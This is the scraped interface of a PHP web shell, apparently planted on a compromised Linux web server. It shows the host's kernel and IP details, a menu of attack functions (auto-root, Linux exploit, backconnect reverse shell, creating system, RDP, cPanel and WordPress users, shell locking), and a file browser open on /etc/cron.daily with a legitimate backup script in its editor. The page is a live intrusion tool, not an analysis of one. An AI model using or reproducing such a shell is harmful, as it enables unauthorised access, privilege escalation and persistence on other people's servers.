Linux asiatechwebsite 3.10.0-1160.144.1.el7.tuxcare.els3.x86_64 #1 SMP Fri Mar 6 13:52:53 UTC 2026 x86_64
Apache
: 10.190.0.3 | : 216.73.216.156
2134 Domain
7.4.33
asiatechinc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
cron.daily /
[ HOME SHELL ]
Name
Size
Permission
Action
0yum-daily.cron
332
B
-rwxr-xr-x
cloudlinux-backup-utils
801
B
-rwxr-xr-x
imunify-antivirus.cron
2.13
KB
-rwxr-xr-x
imunify-realtime-av-fchange-up...
244
B
-rwxr-xr-x
imunify360.cron
2.14
KB
-rwxr-xr-x
logrotate
258
B
-rwx------
man-db.cron
618
B
-rwxr-xr-x
ossec_logs_cleaner
427
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cloudlinux-backup-utils
#!/bin/bash LOG_FILE=${1:-/var/log/cloudlinux-backup-utils-cron.log} log() { echo "$(date -u): ${*}" >>"${LOG_FILE}" } refresh_token_if_present() { backend=${1} token_file=/var/restore_infected/${backend}_api_token.json if [ -f "${token_file}" ]; then log "${backend}: refreshing auth token" out=$(/usr/bin/restore_infected "${backend}" extra refresh_token 2>&1) exit_code=$? if [ "${exit_code}" != "0" ]; then log "${out}" log "Token refresh failed" echo "${out}" echo "Token refresh failed" return 1 fi log "Auth token refreshed" else log "${backend}: not initialized, skipping..." fi } refresh_token_if_present acronis refresh_token_if_present r1soft
Close